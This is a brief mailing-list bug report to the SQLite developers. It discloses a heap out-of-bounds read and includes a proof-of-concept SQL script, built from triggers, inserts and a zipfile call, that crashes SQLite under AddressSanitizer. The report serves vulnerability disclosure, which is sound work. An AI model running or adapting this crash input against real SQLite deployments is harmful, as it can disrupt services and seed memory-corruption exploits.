Hi,

We found an OOB read in sqlite. Here's the PoC:

---
CREATE TABLE v0 ( v2 NOT NULL PRIMARY KEY , v1 ) ;
CREATE TEMP TRIGGER y AFTER INSERT ON v0 BEGIN DELETE FROM v0 ; END ;
CREATE TRIGGER x DELETE ON v0 BEGIN INSERT INTO v0 ( v2 ) VALUES ( 10.1 ) ,( '' ) ,('') ,( 1) ,( 1) ,( 1) ,( 1 ) ON CONFLICT DO NOTHING ; END ;
INSERT INTO v0 VALUES ( 10 , 10 ) ;
INSERT INTO v0 VALUES ( 10 , 10 ) ;
INSERT INTO v0 VALUES ( 10 , 10 ) ;
SELECT v2 + zipfile ( v2 , v1 + v2 ) == '1' , quote ( v1 LIKE '1' ) FROM v0 ;
---
When we run it with sqlite compiled with ASan, we get a heap overflow crash. The bug exists in the latest development code.

Yongheng & Rui

_______________________________________________
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users